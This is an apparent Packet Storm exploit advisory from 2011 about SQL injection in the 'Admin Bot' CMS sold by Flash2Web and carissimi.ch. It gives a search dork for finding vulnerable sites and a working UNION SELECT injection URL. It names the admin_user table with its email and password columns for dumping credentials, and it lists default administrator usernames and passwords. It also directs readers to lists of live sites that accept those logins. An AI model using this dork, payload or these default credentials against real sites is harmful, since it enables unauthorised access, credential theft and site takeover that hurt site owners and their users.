Admin Bot SQL Injection

2011-11-06T00:00:00
ID PACKETSTORM:106664
Type packetstorm
Reporter baltazar
Modified 2011-11-06T00:00:00

Description

                                        
                                            `# Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>  
# CMS name : Admin Bot  
# Site : Flash2Web.com and carissimi.ch  
# Dork : inurl:/news.php?wgo=  
# Admin panel : http://www.site.com/admin  
# Column number : 8 or 9  
# http://www.site.com/news.php?wgo=666+and+1=2+union+all+select+0,1,BALTAZAR,3,4,5,6,7,8--  
# Table : admin_user  
# Columns : email, password  
#   
# Default admin login :  
# Username: pepe@flash2web.com  
# Password: pepe or jactaalea  
#  
# List of sites vulnerable to default admin login can be found on http://flash2web.com and http://www.carissimi.ch/   
# Sites made by www.carissimi.ch are also vulnerable to SQLi  
#   
# Special greetz to my friend sinner_01  
# greetz for d3hydr8, qk, marezzi, fx0, TraXdata, v0da, MikiSoft and all members of ex darkc0de.com, ljuska.org and x0rg.org  
`